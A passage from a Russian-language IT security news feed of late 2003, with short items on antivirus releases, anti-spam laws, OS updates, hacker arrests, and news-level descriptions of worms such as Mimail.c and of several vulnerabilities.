"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакеров и спама, сообщает о начале бета-тестирования Антивируса Касперского® для Microsoft ISA Server 5.0. Компания приглашает всех желающих принять участие в программе внешнего тестирования продукта нового поколения, предназначенного для антивирусной защиты корпоративной сети. Антивирус Касперского® для Microsoft ISA Server 5.0 представляет собой систему антивирусного контроля над файлами, передаваемыми по протоколам HTTP и FTP через межсетевой экран Microsoft Internet Security and Acceleration Server. Программа выполняет функцию фильтра, обрабатывающего исходящий и входящий трафик с целью выделения контролируемых объектов и их последующего анализа на присутствие вредоносного кода. В случае обнаружения зараженных данных система блокирует их дальнейшую передачу, полностью исключая проникновение вирусной угрозы в локальную сеть организации. Антивирус Касперского® для Microsoft ISA Server 5.0 обладает широким набором пользовательских функций. С помощью простого и удобного интерфейса, полностью интегрированного с системой администрирования ISA-сервера, ISA Microsoft Management Console, системный администратор может задать расписание автоматического обновления антивирусных баз через интернет либо выполнять его в ручном режиме. Подробности об участии - http://www.kaspersky.ru/beta.html
2/11/2003 10:33 Британцы намереваются добиться экстрадиции американских спамеров.
Британские законодатели намереваются использовать новую тактику в борьбе со спамерами, сообщает Reuters. В случае ее успешного внедрения, американских организаторов несанкционированных рекламных рассылок, чьи письма приходят в ящики британских пользователей, ожидает экстрадиция в Соединенное Королевство. Великобритания стала вторым членом Европейского союза после Италии, принявшим закон об уголовном преследовании спамеров. Однако поправки в уголовный кодекс, которые должны вступить в силу в декабре, вызвали поток критики со стороны активных борцов со спамом. По их мнению, принятый закон является неэффективным, поскольку большая часть авторов спам-писем проживает за пределами Великобритании, в частности, в США. Новые изменения в законе первоначально будут касаться только спамеров, однако, вполне возможно, что в дальнейшем они затронут вирусописателей и хакеров. Группа британских парламентариев недавно посетила с рабочим визитом США, где вместе с представителями ФБР обсудила вопросы экстрадиции американских спамеров, нарушивших законы Соединенного Королевства. Подробности - http://www.ciol.com/content/news/2003/103103012.asp
1/11/2003 20:05 Выход Mozilla 1.6 Alpha.
Mozilla Foundation только что выпустило Альфа версию Mozilla 1.6 - которая является первым этапом в цикле разработки 1.6. В ней много улучшений. Улучшена работа с почтой и новостными группами, включая поддержку vCard и опцию удаления почты с POP сервера через Ч дня. Подробности - http://www.mozilla.org/releases/mozilla1.6a/
1/11/2003 19:42 Вышел OpenBSD 3.4.
Как сообщает linux.org.ru, 30.10.2003 вышла OpenBSD 3.4, на два дня раньше чем обещалось. Авторы поняли, что ждать еще два дня никто уже не мог и пошли на этот шаг. Изменений очень много, как обычно: безопасность, новые пакеты, вопросы лицензирования и т.д. Подробности - http://openbsd.org/34.html
1/11/2003 19:27 ЕС запрещает спам.
Во всем Европейском союзе вступили в силу новые законы, призванные уменьшить количество электронного спама. В соответствии с новыми правилами, прежде чем посылать электронные письма, компании должны получить согласие адресатов этих сообщений. Новые законы полностью запрещают спам на территории всего Евросоюза. Нежелательные имейлы, известные как спам, составляют примерно половину всей электронной переписки в ЕС. Новые европейские законы также ограничивают возможности компаний в использовании так называемых "кукис" - файлов, позволяющих получать информацию о пользователях, посещающих сайты этих компаний. Меры наказания, применимые к компаниям и частным лицам, нарушающим новые законы, остаются на усмотрение государств-членов Евросоюза. "Закон является ключевым инструментом, позволяющим укрепить доверие к Интернету и электронным средствам сообщения, необходимым для успешного развития электронной торговли", - сказал комиссар ЕС по предпринимательству Эркки Лииканен. Источник - http://www.bbc.co.uk
1/11/2003 19:09 Cтатья "Мнение о Defaced eZine #3 - есть ли у него будущее?".
На сайте securitylab.ru выложена статья товарища с ником nometer, в которой автор высказывает своё мнение как о самом журнале, так и об отдельных статьях, которые помещены в недавно вышедший (26 октября) третий номер этого электронного журнала. Статья - http://www.securitylab.ru/41037.html
1/11/2003 18:26 У "Яндекса" проблемы с почтой.
Начиная с четверга, некоторые пользователи почтовой службы "Яндекса" при работе со своим ящиком в веб-интерфейсе видят следующее сообщение: "Произошел сбой диска. Не беспокойтесь, мы восстанавливаем ваши письма и адресные книги из архива. Процедура займет около двух-трех суток. Все новые письма принимаются и отправляются в нормальном режиме. Приносим свои извинения". Как сообщили в компании, поскольку восстановление данных пользователей (писем, адресных книг, настроек) потребует времени, "пострадавшие" пользователи временно обслуживаются другим сервером. Процесс восстановления на данный момент почти завершен, отметили в компании. Конкретные данные о причине возникновения сбоя и понесенном ущербе компания не предоставила. Источник - http://www.cnews.ru
1/11/2003 18:16 Новая модификация червя Mimail ворует данные платежной системы.
"Лаборатория Касперского" сообщила об обнаружении Mimail.c - новой модификации известного сетевого червя Mimail. На данный момент уже зарегистрировано несколько случаев заражения компьютеров этой вредоносной программой. Mimail.c является классическим почтовым червем, распространяющимся через электронные письма, которые выглядят следующим образом: Адрес отправителя: james@домен получателя, Заголовок: Re[2]: our private photos, далее следует текст письма и аттач - файл photos.jpg.zip. Стоит отметить, что адрес отправителя зараженных сообщений формируется с помощью добавления к нему домена получателя. Таким образом, затрудняется локализация эпицентра заражения и у пользователя может создаться впечатление, что письмо пришло от одного из коллег или знакомых. Если пользователь имел неосторожность открыть вложенный файл, то Mimail.c запускает процедуры внедрения на компьютер и дальнейшего распространения по сети. Прежде всего, червь копирует себя в каталог Windows с именем netwatch.exe, регистрирует этот файл в ключе автозапуска системного реестра операционной системы и создает ряд дополнительных служебных файлов. В частности, при создании одного из этих файлов червь использует встроенные процедуры ZIP-архивации. Для рассылки зараженных писем Mimail.c также использует встроенные функции - специальную процедуру для распространения по протоколу SMTP. Червь сканирует файлы в каталогах Shell Folders и Program Files и считывает из них строки, похожие на адреса электронной почты. По найденным адресам Mimail.c незаметно для пользователя рассылает свои копии. Червь обладает опасным побочным действием, которое может вызвать существенный ущерб для пользователей платежной системы E-Gold. В частности, Mimail.c следит за активностью приложений E-Gold, установленных на зараженном компьютере, считывает из них конфиденциальные данные и отсылает на несколько анонимных адресов, принадлежащих автору червя. Помимо этого, со всех зараженных компьютеров червь осуществляет распределенную DoS-атаку на сайты www.darkprofits.com и www.darkprofits.net, отсылая на них в бесконечном цикле пакеты произвольного размера. Источник - http://www.kaspersky.ru
1/11/2003 18:07 Чилийские хакеры меняли украденные песо на доллары в интернете.
Полиция Чили разыскивает хакера, сумевшего обойти системы компьютерной безопасности целого ряда организаций и похитить в общей сложности 234 тыс. долларов США, сообщает газета El Mercurio. В числе пострадавших от деятельности преступника оказались банк, два обменных пункта, агентство недвижимости и инвестиционная компания. К настоящему времени сотрудники Департамента по борьбе с экономическими преступлениями сумели задержать Карлоса Ивана Патуэйе (Carlos Ivan Patuelle), подозреваемого в соучастии в совершенных хакером деяниях. Патуэйе был арестован во время попытки получить 54 тыс. долларов по ваучеру, выписанному от имени государственного телевидения Чили. Преступники посещали корпоративные сайты, получали на них информацию о клиентах и затем переводили их деньги на собственные счета. Затем, пользуясь исключительно интернетом, хакеры небольшими суммами переводили свои деньги в доллары в обменных пунктах, и, убедившись в нормальном ходе операции, забирали наличность. Подробности - http://www.webpanto.com/modules.php?name=News&file=article&sid=2856
1/11/2003 18:01 Google может объединиться с Microsoft.
Компания Google, намеревающаяся выпустить свои акции на фондовый рынок, также, предположительно, ведет переговоры с корпорацией Micorosft о слиянии, сообщает в пятницу газета New York Times. Представители той и другой стороны говорить на эту тему отказываются. Тем не менее, Google, поисковая система которой пользуется беспрецедентной популярностью и имеет большие рекламные возможности, может сначала разместить свои акции в публичном секторе и получить соответствующие инвестиции, после чего, спустя некоторое время, объединиться с Microsoft - крупнейшим мировым производителем ПО. Подробности - http://www.nytimes.com/2003/10/31/technology/31net.html?...
1/11/2003 17:57 Новая статья: Взлом протектора 1Way или как не надо писать защиты.
Взлом протектора 1Way или как не надо писать защиты. В статье показывается, как можно обойти 1Way защиту для shareware программ. Статья может быть полезна, как защитописателям, так и защитокопателям. Ознакомиться: http://www.uinc.ru/articles/43/index.shtml
31/10/2003 15:18 Cтатья "Использование SNMP-сервисов".
Благодар rend с sysadmins.ru обнаружена ссылочка на статью "Использование SNMP-сервисов". Собственно, сам сайт принадлежит Сафоновскому колледжу информационных технологий. SNMP - сетевой сервис, предназначенный для управления различными сетевыми устройствами. Сама статья представляет собой как бы план лекции (практического занятия) данного колледжа (?). В общем, вполне можно рекомендовать для начального изучения SNMP. Статья - http://scit.boom.ru/Andre_S/15_Ispolzovanie.htm
31/10/2003 14:15 Москва: подробности об очередном антипиратском рейде Комиссии.
28 октября сотрудниками ОБСППР ГУВД г. Москвы (отдел по борьбе с преступлениями на потребительском рынке) совместно с специалистами Комиссии по безопасности информационного рынка Совета Предпринимателей при Мэре и Правительстве Москвы по заявлению Ассоциации «Русский Щит», представляющей правообладателей на компьютерном рынке, был проведен антипиратский рейд на территории торгового комплекса «Москва» в Люблино. 28 октября на рынок зашло сразу несколько групп оперативников из городского отдела потребительского рынка (ОБСППР ГУВД) в сопровождении специалистов Комиссии и представителей Ассоциации «Русский Щит». На двух точках с максимальным количеством контрафакта сотрудники ОБСППР провели контрольные закупки. Выявлены факты реализации пиратских версий программ Finereader и Lingvo компании Abbyy; переводчика Promt XT Office (компания «Проект МТ»), игр Gotica II, Robin Good: Defender of the Crown, Postal 2, Terminal Machine от компании Акелла; Empire of Magic, Republic: Revolution, Championship Manager IV, Tomb Rider VI от Нового Диска, Conflict: Desert Shtorm 2, Heroes of M&M IV от компании Бука; а также музыка российских исполнителей в формате MP3 (легально выпускается компанией RMG). Все данные правообладатели объединены в Ассоциацию “Русский Щит”, заявление которой и послужило поводом для проведения проверки в торгововм комплексе. Всего с точек было изъято 570 и 970 дисков с признаками контрафактости, которые направлены для проведения исследования в ЦНКЭС. По получению официального подтверждения от экспертов о крупном ущербе и контрафактности дисков, против продавцов и руководителей точек будет возбуждено уголовное дело по статье 146 УК РФ (“Нарушение авторских прав”). Более подробно - http://www.oxpaha.ru/view.asp?10479
31/10/2003 13:00 Ещё один сайт по FAQ Windows.
Обнаружен ещё один сайт, посвящённый проблемам Windows (разнообразных версий). Несмотря на то, что на сервере представлены ОС: 2К, NT 4.0, 95/98 - из них работаютссылки только на NT и Вынь 9*, но, возможно, этот сайт кому-то окажется полезен. Сай - http://home.comset.net/formet/faq.shtml
31/10/2003 12:28 Федералы проверяют учеников на благонадежность.
12-летний Джон МакЛин готовил домашнее задание. Среди прочих упражнений ему надо было написать реферат. Мальчик выбрал достойную тему. Джон решил писать о самом длинном в мире мосте-туннеле через Чесапикский залив. Преподаватель действительно посоветовал ему еще пару веб-ресурсов для изучения. Среди них был и администрация транспорта Мэрилэнда. Спустя несколько дней в школу к Джону пожаловали федералы. Представители группы по борьбе с терроризмом хотели установить личность того, кто так живо интересовался Чесапикским мостом. Оказалось, есть предположения о том, что пользователи, собирающие информацию о государственных объектах в онлайне (в частности, о мостах и туннелях), на самом деле являются террористами, маскирующимися под школьников. Как сообщает Morons.Org , лучшим способом избежать подобной угрозы посчитали отправку анти-террористических сил в средние школы за подтверждением личности учеников, а также благих причин, по которым они обратились к общественной информации. Источник - htp://www.runet.ru
31/10/2003 11:23 Microsoft выпустила обновления трех патчей для Windows.
Как сообщает compulenta, компания Microsoft выпустила обновленные варианты трех бюллетеней безопасности, впервые представленных 15 октября. В обновленных версиях заплаток для Windows используется иная версия утилиты Update.exe. В исходных патчах использовалась утилита версии 5.3.23.4, требующая при запуске прав на отладку (Debug Rights). В результате, на некоторых компьютерах, где права на отладку были отключены для всех пользователей, заплатки не устанавливались. Для устранения этой проблемы в обновленных заплатках применяется файл Update.exe версии 5.4.1.0, не требующий для запуска Debug Rights. В Microsoft подчеркивают, что обновленные патчи не устраняют никаких новых дыр, и их не нужно устанавливать, если оригинальные версии заплаток установились нормально. Кроме этого, 22 октября Microsoft обновила патч, описанный в бюллетене MS-03-045. Это обновление также не связано с безопасностью и касается неправильной работы некоторых программ от сторонних компаний в локализованных версиях Windows 2000 SP4, в том числе в русской. Если поьзователи не испытывают никаких проблем с оригинальной заплаткой, то обновленную версию устанавливать не нужно. Источник - http://www.compulenta.ru
31/10/2003 11:12 Исправление драйверов USB для Windows XP.
Компания Microsoft выпустила обновление драйверов шины USB 1.1 и 2.0 для операционной системы Windows XP. Новая версия драйверов призвана устранить проблему, приводившую к зависанию компьютера при попытках вывести его из "ждущего" (standby) или "спящего" (hibernate) режимов с помощью USB-устройства (мыши, клавиатуры и т.д.). Специалистам Microsoft удалось решить эту проблему, после чего и было выпущено обновление. Тем не менее, устанавливать его рекомендуется только, если сбои при работе с USB-устройствами сильно мешают работе. Во всех прочих случаях лучше дождаться второго сервис-пака к Windows XP, в который будет включена досконально протестированная версия драйверов. Выход Service Pack 2 к Windows XP намечен на 2004 год. Обновление - http://support.microsoft.com/default.aspx?scid=kb;en-us;826959
30/10/2003 20:39 Эксплоит уязвимости ls.
Опубликован код уязвимости в команде ls (вывод списка файлов директории, либо вывод информации о файле) для довольно популярного в мире *nix-систем FTP-сервера wu-ftpd. Как нам написал сам автор эксплоита, написанного на Perl (Druid), код проверен на wu-ftpd 2.6.2. Напомним, что утилита ls входит в состав пакета fileutils. Уязвимость была обнаружена ранее Georgi Guninski. Исходник - http://packetstormsecurity.nl/filedesc/ls_ftp.pl.html
30/10/2003 20:04 Хакеры всех стран - объединяйтесь под логотипом Эрика С. Реймонда?
Как сообщает linux.org.ru, на slashdot ведётся очень интересная дискуссия. Суть её вот в чём - Эрик Реймонд предложил логотип для сообщества хакеров. Его мотивация: "У линуксоидов есть их пингвин, у BSDшников их демон. У Перла - лама, у фанатов FSF - гну и у OSI есть свое open-source лого. Исторически сложилось, что нет эмблемы символизирующей все сообщество хакеров, частью которого эти группы являются. Есть предложение принять такой вариант - элемент "glider" из игрушки "Жизнь" (Life). В обсуждении новости на slashdot разные мнения - от предложения альтернатив (например символа похожего на "Н", который через 6 ходов в Life попросту исчезает :), до мнений, что хакерам даром не сдался какой-то "объединяющий их символ". Вероятно вам будет интересно, если вы - хакер :) Подробности - http://slashdot.org/articles/03/10/...
30/10/2003 19:52 Множественные уязвимости в MacOS 10.2.
Компания @stake, Inc., известная своими наработками в области компьютерной безопасности сообщает сразу о 3-х уязвимостях в ОС, выпускаемой компанией Apple MacOS 10.2. Первая из низ связана со слабыми полномочиями различных приложений, связанными с некорректной установкой ОС прав доступа при перемещении папок и неверные (с точки зрения безопасности) настройки программ их разработчиками. Вторая связана с переполнением буфера, возникающем в ядре, при обработке слишком длинных параметров командной строки (или длинном аргументе приложения). И, наконец, третья уязвимость связана с проблемой символических связей при генерации системой core-файлов (подобные файлы генерируются приложениями при их аварийном завершении, анализ подобных файлов при помощи отладчиков помогает разработчикам находит ошибке в коде программ). Эти файлы сохраняются в каталоге /core открытом на запись с предсказуемым именем без проверки символических ссылок. По поводу самих уязвимостей в секьюрити-сообществе развернулась бурная дискуссия, связанная с тем, что Apple не стала выпускать заплаток для MacOS 10.2, а предлагает всем обновить ОС до вновь вышедшей MacOS 10.3 Panther, что вызывает справедливое негодование многих пользователей и администраторов. Подробности - http://www.atstake.com/research/advisories/
30/10/2003 19:21 Код мощной САПР украли и выложили в интернете.
Американская компания Alibre, занимающаяся разработкой систем автоматизированного проектирования, заявила о краже исходного кода своей трехмерной САПР Alibre Design. По некоторым сведениям, в этом замешан работавший в компании российский программист. Машиностроительная САПР RaceCAD, созданная на базе похищенного кода Alibre Design распространяется совершенно бесплатно через интернет. Домашняя страница RaceCAD располагается на сервере бесплатного хостинга narod.ru и имеет несколько зеркал. Впрочем, ссылки для загрузки RaceCAD на момент подготовки данного материала уже не работали. Никаких координат разработчиков системы, за исключением адреса электронной почты, на сайте не приводится. В Alibre отмечают, что помимо кода, созданного усилиями Alibri, были похищены разработки других фирм из США, Франции и Великобритании, которые были лицензированы Alibre для использования в своей САПР. В числе других пострадавших называются компании Spatial, Dassault Systemes и D-Cubed Более подробно - http://www.compulenta.ru/2003/10/30/42941/
30/10/2003 19:06 "Голден Телеком" предоставит доступ к сети SWIFT в РФ и СНГ.
Компания "Голден Телеком" заключила соглашение с AT&T о предоставлении доступа к защищенной IP-сети SWIFT (SWIFT Secure IP Network, или сокращенно SWIFT SIPN) в России и странах СНГ. Как сообщила пресс-служба "Голден Телеком", это соглашение было одобрено SWIFT и позволяет обеспечивать заказ, установку и сопровождение услуги и заключать договора на доступ к SWIFT SIPN. Для подключения пользователей SWIFT по всему миру к SIPN были выбраны четыре глобальных телекоммуникационных партнера, одним из которых является AT&T. Компания AT&T заключила со SWIFT генеральное соглашение и предоставляет пользователям SWIFT доступ к SIPN через сеть IP VPN, построенную на основе технологии MPLS (MultiProtocol Label Switching). SWIFT - это объединенная отраслевая система, обеспечивающая защищенные от несанкционированного доступа, стандартизированные услуги обмена сообщениями и предоставляющая свои услуги для 7500 финансовых институтов в 200 странах мира. Сообщество членов SWIFT включает банки, брокерские и дилерские конторы, институты инвестиционного управления, а также инфраструктуру в сфере осуществления платежей, операций с ценными бумагами, обслуживания казначейств и пунктов торговли. Источник - http://www.cnews.ru
30/10/2003 18:39 Вышла утилита для настройки компьютеров на базе Nvidia nForce.
Корпорация Nvidia представила Nvidia System Utility - инструмент настройки для материнских плат и компьютеров на базе Nvidia nForce. ПО входит в состав Nvidia ForceWare и позволяет пользователям тонко настроить BIOS и изменить конфигурацию настроек для достижения оптимальной производительности системы. Все настройки производятся в рамках Microsoft Windows. Утилита доступна для скачивания по адресу http://www.nvidia.com/. Функциональность данной утилиты зависит от материнской платы и производителя; вот некоторые из плат, основанных на процессорах NVIDIA nForce2- и NVIDIA nForce3, которые поддерживают ее полную функциональность: ASUSTeK A7N8X-E, Biostar M7NCG, Epox EP-8RDA+ и EP-8RDA3+, Abit NF7, Gigabyte K8NNXP, Shuttle AN50R. Nvidia System Utility также поставляется с некоторыми материнскими платами и компьютерами от разных производителей. Список плат и компьютерных систем, поставляющихся с утилитой, будет обновляться на сайте компании. Объём утилиты - 5МБ. Утилита - http://www.nvidia.com/object/sysutility_1.0.html
30/10/2003 18:16 Электронный журнал "Спамтест" No. 21.
На сайте "Лаборатории Касперского" опубликован очередной еженедельный выпуск электронного журнала "Спамтест". В журнале: Новости, интервью с соавтором OFISP-008 Сергеем Мухиным, статьи читателей "Антиспам - советы по выживанию", ответы на вопросы читателей. Подробности - http://www.kaspersky.ru/news.html?id=143806554
30/10/2003 18:09 Спамеры украли электронные адреса клиентов Orbitz.
Интернет-оператор по продаже авиабилетов Orbitz сообщил правоохранительным органам о недостатке в работе своего сервера, с помощью которого адреса нескольких миллионов клиентов оказались в распоряжении спамеров. "Некоторые клиенты проинформировали нас о получении спама от неизвестных отправителей. Авторы рассылки, по-видимому, воспользовались незаконным методом получения электронных почтовых адресов, используемых Orbitz", - приводит Associated Press слова пресс-секретаря компании. При этом свидетельств хищения данных о счетах пользователей или их паролей не зафиксировано. Туроператор Orbitz, обслуживающий около 18 млн клиентов, начал собственное расследование по факту попадания электронных почтовых адресов в распоряжение спамеров. Источник - http://www.viruslist.com
29/10/2003 20:45 Удаленное переполнение буфера в mod_security для Apache 2.х.
Обнаружена уязвимость в модуля Апача версии 2.х mod_security. Удаленный пользователь может выполнить произвольный код на уязвимой системе. Уязвимость обнаружена в функции sec_filter_out() в apache2/mod_security.c. Атакующий может сконструировать PHP сценарий, который генерирует чрезмерно большие выходные данные, например, когда записывает большой файл в output. Переполнение не произойдет, когда запрашивается чрезмерно большой файл на прямую из сервера (GET методом). Уязвимость может эксплуатироваться атакующим, способным загружать собственные сценарии на сервер или через некоторые XSS уязвимости на сайте. Для устранения уязвимости рекомендуется установить обновлённую версию - 1.7.2. Подробности - http://www.securitylab.ru/40977.html
29/10/2003 20:19 VMware - виртуальный полигон для администратора и разработчика.
Андрей Бешков, ака tigrisha на форуме sysadmins.ru, опубликовал на сайте opennet.ru статью под названием "VMware - виртуальный полигон для администратора и разработчика", которая в бумажном виде была опубликована в журнале "Системный администратор". Довольно полезная и интересная статья о ПО VMware, позволяющем на одном PC создать виртуальную машину под управлением ОС Windows. Cтатья - http://onix.opennet.ru/vmware/vmware_win.html
29/10/2003 20:07 Выход BitDefender AntiVirus for Samba.
Как сообщает linux.org.ru, компания SoftWin (Румыния) выпустила первую бета-версию BitDefender AntiVirus для Samba. В отличие от многих аналогичных продуктов, BitDefender умеет проверять файлы "на лету" (во время запроса с сервера), используя при этом эффективную систему кэширования для повышения производительности. В числе других возможностей программы: проверка архивов (.zip, .rar, gz, .tar, и др.), обновление через Интернет (в настоящий момент база данных BitDefender содержит информацию о 90 000 для Windows, DOS и Linux/Unix), эвристический анализ и "карантин" (место для изоляции подозрительных и зараженных файлов). BitDefender Antivirus работает на любой системе, включающей в себя ядро 2.4.x, glibc 2.2.3+, gcc 2.9x/3.x и систему управления пакетами rpm/deb/tar (Red Hat, SuSE, Mandrake, Slackware, Debian, Gentoo). Подробности - http://linuxpr.com/releases/6357.html
29/10/2003 19:48 Выход FreeBSD 4.9-RELEASE.
После нескольких RC (релиз-кандидатов) вышла FreeBSD 4.9-RELEASE - предположительно последний релиз ветки 4.x. Из нового: бэкпорт PAE (поддержка 64GB памяти на машинах выше Pentium Pro) из FreeBSD 5-CURRENT; бэкпорт ACPI из FreeBSD 5-CURRENT; новые драйверы устройств; исправления ошибок; GNOME-2.4; KDE-3.1.4; и многое другое. Подробности - http://www.freebsd.org/releases/4.9R/relnotes-i386.html
29/10/2003 19:16 Антивирус Касперского для почтовых Unix-серверов 5.0.
"Лаборатория Касперского" сообщает о выпуске новой версии Антивируса Касперского для почтовых серверов Linux/Unix 5.0, которая пришла на смену предыдущей версии 4.0. Продукт включает в себя ряд существенных изменений и доработок, значительно повышающих функциональность и производительность защиты. Антивирус Касперского для почтовых серверов Linux/Unix предназначен для проведения централизованной антивирусной проверки всех потоков электронной корреспонденции в масштабе реального времени. Система поддерживает FreeBSD, OpenBSD и наиболее популярные дистрибутивы Linux и позволяет осуществлять эффективный поиск и нейтрализацию вредоносных кодов во всех объектах, проходящих через сервер, обеспечивая доставку на клиентские компьютеры только гарантированно безопасных данных. Основным отличием Антивируса Касперского для почтовых серверов Linux/Unix 5.0 является реализация новой антивирусной технологии, последней разработки экспертов "Лаборатории Касперского". Системным администраторам также придется по вкусу модернизированная система централизованного управления. В частности, теперь продукт поставляется вместе с модулем (plug-in) к популярной программе Webmin, что позволило расширить функциональность удаленного администрирования и улучшить совместимость. Источник - http://www.kaspersky.ru
29/10/2003 19:03 Вышла новая версия антивируса PC-cillin.
После почти годичного перерыва, компания Trend Micro выпустила новую версию свого антивирусного пакета PC-cillin Internet Security. Среди новых возможностей PC-cillin Internet Security 2004 следует упомянуть, прежде всего, систему защиты от спама, использующую набор подписей, "белых" и "черных" списков отправителей, а также эвристический анализатор для распознавания спама. Эта функция работает с протоколом POP3, а также с некоторыми популярными почтовыми серверами, например, AOL. Новый вирус-сканнер PC-cillin теперь обнаруживает не только вирусы, но и рекламные и шпионские программы, которые самоинсталируются на компьютере. Разработчики постарались усилить и обычные антивирусные функции. Прогамма способна просматривать шестислойные архивы 24 различных алгоритмов сжатия. PC-cillin Internet Security 2004, кроме того, сканирует траффик, предотвращая проникновение на компьютер новых сетевых вирусов типа W32.Blaster, которые не записываются на жесткий диск. Подробнее - http://www.compulenta.ru/2003/10/29/42879/
29/10/2003 18:41 Австралийский троянец замаскировался под последнюю "Матрицу".
Случай массовой рассылки троянской программы, замаскированной под фильм "Матрица: Революция" (The Matrix Revolutions), зафиксирован в Австралии, сообщает сайт газеты The Sydney Morning Herald. Текст опасного послания гласит: "Матрица: Революция" выходит 5 ноября. Вам не нужно ловить свой билет. Только 1000 человек могут скачать весь фильм с нашего сайта. Сделайте это пока не поздно!" Вложенные в письмо графические файлы ведут пользователя на настоящий сайт фильма, а текстовые гиперссылки - на веб-страницу с троянской программой. Для того, чтобы достоверно установить факт наличия на сайте троянской программы один из австралийских системных администраторов воспользовался браузером, работающим в среде Linux. Таким образом он обезопасил от заражения свой компьютер, поскольку вредоносная программа написана для ОС Windows. "Я не уверен на 100 процентов, что это действительно троянская программа, поскольку у меня нет машины, которой можно было бы пожертвовать. Я направлю копию кода всем крупнейшим производителям антивирусного программного обеспечения, чтобы они довели дело до конца", - рассказал администратор. Источник - http://www.viruslist.ru
29/10/2003 18:38 Web гудит о голосовом плане Microsoft
В WWW просочилась информация о новом приложении Microsoft, наделяющем карманные компьютеры с операционной системой Pocket PC способностями распознавания речи. В сентябре Microsoft начала набирать бета-тестеров для испытаний Voice Command, программного модуля для КПК на платформе Pocket PC и смартфонов. Согласно предоставленной тестерам информации, программа позволит управлять всеми основными функциями устройства, проговаривая команды в микрофон. Представитель Microsoft сообщил, что компания планирует выпустить ПО на будущей неделе через специализированный веб-сайт Handango. Однако сведения о приложении и его цене появились на этом сайте в конце прошлой недели, так что энтузиасты Pocket PC уже в курсе дела. Согласно Handango, программа будет продаваться за 40 долл. На сайте она значится как уже доступная, однако попытки загрузить ее приводят к сообщению об ошибке. В описании говорится, что Voice Command позволит пользователям Pocket PC выполнять посредством голосовых команд все основные функции — такие как доступ к календарю и информации о контактах, звонки по телефону и запуск программ. Кроме того, ПО будет интегрировано с карманной версией Microsoft Media Player, что позволит управлять воспроизведением цифровой музыки при помощи голоса. Подробности - http://zdnet.com.com/2100-1104_2-5098197.html
29/10/2003 18:02 В Иране зафиксирован первый случай хакерской атаки на банк.
Первый случай хакерской атаки на банк зафиксирован в Иране, сообщает агентство AFP. Преступник, задержать которого пока не удалось, сумел похитить в одном из иранских банков 700 миллионов риалов (83 тысячи долларов). Для осуществления своего замысла хакер проник в сеть банка и выписал кредит на собственное имя, который позже сумел получить в одном из недавно появившихся в стране банкоматов. Название банка в информационном сообщении не приводится, однако, вполне возможно, что речь идет об одном из старейших иранских финансовых учреждений - Bank Melli. По данным ряда иранских СМИ, на прошлой неделе этот банк испытывал серьезные затруднения с работой банкоматов. Источник - http://www.afp.com/
28/10/2003 17:40 Появление нового быстрораспространяющегося троянца.
В сетевом сообществе появились сведения о повялении нового быстрораспространяющегося троянца. Впервые о нём сообщил Bugtraq Gadi Evron из Израиля. По его сообщению, начальная стадия заключается в приходе почтового сообщения с предложением загрузить графический (*.jpg) файл. Часто его название звучит, как britney.jpg. На самом деле файл на указанной странице является HTML-файлом, который, будучи запущен через браузер, запускает джава-скрипт, который в закодированном виде пытается скрыть своё присутствие, затем загружает из Интернета файл patch.exe и замещает им файл mplayer.exe. Этот файл соединяется с mIRC DDE-сервером, заставляя mIRC спамить и после этого повреждает файл реестра. Как указывает в далнейшей дискуссии K-OTiK Security, червь использует уязвимость в Windows Media Player, которая была описана ранее (11 сентября) jelmer и патч для которой давно выпущен M$. Антвирусные компании уже внесли этого червя в базу сигнатур и он определяется, как IRC.Trojan.Fgt [Symantec] IRC-Worm.Fagot [Kaspersky], Fagot [F-Secure]. Имеет длину 156,672 байт. При зхаражении также деактивирует персональные файрволлы и антивирусное ПО. Подробности - http://securityresponse.symantec.com/avcenter/venc/data/irc.trojan.fgt.html
28/10/2003 14:32 В Москве задержан 17-летний хакер.
В Москве за неправомерный доступ в компьютерную сеть Интернет задержан 17-летний хакер. Об этом РИА "Новости" во вторник сообщил представитель пресс-службы Управления "К" МВД России, которое занимается расследованием преступлений в сфере высоких технологий. "Молодой человек, проживающий в Москве на улице Верхняя Масловка, был задержан во время оперативно-профилактической операции "Сеть-2003", - сказал собеседник агентства. По его словам, этот гражданин в течение длительного времени неоднократно осуществлял неправомерный доступ в сеть Интернет. "Используя вредоносные программы для ЭВМ, он незаконно копировал реквизиты доступа в сеть Интернет, тем самым принес материальный ущерб фирме-провайдеру и пользователям сети на сумму около 300 тыс рублей", - пояснил представитель пресс-службы. В отношении задержанного возбуждено уголовное дело по трем статьям Уголовного кодекса, добавил он. Источник - http://www.rian.ru
28/10/2003 14:03 Проверка уязвимости Sun JVM.
Некто Michael Earls создал на своём сервере страничку, с которой запускается джава-апплет (sun.applet.AppletClassLoader) и определяется, обладает ли обратившийся на страницу браузер уязвимостью (естественно, если включён джава плагин). Для этого должна быть задействована Sun JVM, а не Microsoft. Тестовая страница - http://bcheck.scanit.be/bcheck/applet.html
28/10/2003 13:49 Новая версия ПО Vanguard.
Компания Vanguard MS, поставщик сетевых решений для корпоративных клиентов, выпустила очередной релиз программного обеспечения Vanguard Applications Ware - версию 6.3, включающую как аппаратные, так и программные новшества. Шифрование Triple DES/AES для Vanguard 342 (в ближайшем будущем также и для Vanguard 340, 4000 и 7300 серий) позволяет реализовать стандартизованные решения криптозащиты данных, поддерживает стандарт шифрования IPSEC DES (56 бит) и 3DES (168 бит) и стандарт AES с ключами 128, 192 и 256 бит. Кроме того, данный механизм обратно совместим с модулями шифрования SIMM (56 и 112 бит), реализующими собственные (нестандартизованные) протоколы шифрования. Программное обеспечение 6.3 представляет возможность установить существующую карту ISDN BRI Data U или S/T daughter card в маршрутизатор Vanguard 340 или 342 и использовать всего один порт SCC (Serial Communication Controller). Новая функция расширяет возможности VG 340 и 342 и позволяет использовать их там, где ранее был необходим маршрутизатор 6435. Функция T.38 позволяет передавать факс-сообщения по сети IP, используя стандартизованный механизм. Стандарт T.38 передачи факсов в реальном масштабе времени позволяет факс-машинам различных производителей работать друг с другом по сетям IP. Протокол VRRP (Virtual Router Redundancy Protocol) поддерживающийся на маршрутизаторах Vanguard 320, 340, 342, 6435, 6455, 7300, представляет собой механизм обеспечения резервирования маршрутов в сетях IP. VRRP позволяет нескольким маршрутизаторам в сети со множественным доступом использовать один "виртуальный" IP-адрес, при этом отказ одного устройства ведет к исполнению его роли другими. Удаленный сервер TN3270 работает в качестве шлюза между приложениями SNA и клиентами TN3270 и TN3270E, работающими поверх сетей IP. Это позволяет избежать необходимости создания или покупки нового ПО для мэйнфреймов IBM. Источник - http://www.osp.ru
28/10/2003 13:26 SCO объявила GPL недействительной!
